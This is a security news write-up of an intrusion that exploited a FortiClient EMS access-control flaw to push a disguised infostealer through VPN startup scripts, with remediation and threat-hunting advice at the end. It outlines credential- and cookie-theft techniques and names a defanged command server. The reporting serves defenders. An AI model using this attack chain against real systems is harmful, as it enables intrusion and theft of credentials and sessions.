Weaponizing Management Consoles: The FortiClient EMS Exploitation

Infrastructure Subversion and Disguise

Adversaries recently weaponized a trusted endpoint management system into a conduit for data exfiltration. According to insights from Arctic Wolf Labs, an exploit targeting FortiClient Endpoint Management Server facilitated this compromise. Consequently, malicious actors distributed a lethal payload through standard administrative mechanisms. Furthermore, they successfully disguised the malicious binary as a legitimate Fortinet update.

Exploiting the Access Flaw

This offensive campaign correlates with a critical vulnerability designated as CVE-2026-35616 within FortiClient EMS. Specifically, an access-control flaw allowed unauthenticated actors to bypass API validations entirely. Therefore, attackers could transmit privileged requests to vulnerable servers effortlessly. After compromising the EMS settings, the hackers altered the Remote Access Profile configurations. Additionally, they manipulated endpoint policies to embed a malicious startup script across managed hosts.

The Mechanics of Tunnel Execution

The intrusion relied heavily on the native VPN configuration of FortiClient. During the establishment of an IPsec tunnel, specific components like fortitray.exe or ipsec.exe initialized batch files. Subsequently, these binaries triggered cmd.exe directly from the FortiClient directory. This action executed an obfuscated, Base64-encoded PowerShell script silently. Ultimately, the script downloaded a malicious payload from the remote server 83[.]138.53[.]110 and returned execution outputs via HTTP.

Deconstructing the Stealer Component

The downloaded binary appeared as FortiEndpoint_Patch.exe on compromised endpoints, while resting as p.exe on the host server. Arctic Wolf Labs formally classified this specialized stealer as EKZ Infostealer. Primarily, the software targets sensitive data harbored within Chrome, Microsoft Edge, and alternative Chromium browsers. Furthermore, it harvests information from Firefox and various Gecko-based applications. The malware systematically extracts stored credentials, session cookies, and autofill forms. Additionally, it plunders telephone numbers, physical addresses, and financial card details.

Session Hijacking and Authentication Bypass

Session cookies represent an exceptionally grave hazard within this attack lifecycle. By hijacking these tokens, adversaries can easily duplicate active user sessions. Consequently, this technique often allows them to bypass multi-factor authentication checkpoints entirely. To harvest these assets from Chromium architectures, EKZ Infostealer circumvents the Chromium Elevation Service. Meanwhile, the malware targets Firefox by loading Network Security Services modules directly. Thus, it seamlessly decrypts standard database repositories such as key4.db, logins.json, and cookies.sqlite.

Discovery of Secondary Artifacts

Furthermore, Arctic Wolf Labs uncovered supplementary malicious artifacts resting on the command server. This collection included a compressed archive and a rogue MSI installer package. Notably, they also discovered an executable file bearing a misspelled Microsoft Windows moniker. However, investigators observed no direct execution of these specific files during the documented intrusion sequence.

Prescribed Remediation and Threat Hunting

Security analysts strongly advise organizations utilizing FortiClient EMS to deploy the remediated software version immediately. Moreover, administrators must restrict access to management port 8013 exclusively to trusted IP addresses. To detect indicators of compromise, defenders should scrutinize EMS event logs for certificate anomalies. Additionally, you should monitor your environment for unauthorized modifications to the Remote Access Profile. Finally, hunt for anomalous PowerShell executions emerging from the FortiClient directory alongside outbound traffic to 83[.]138.53[.]110.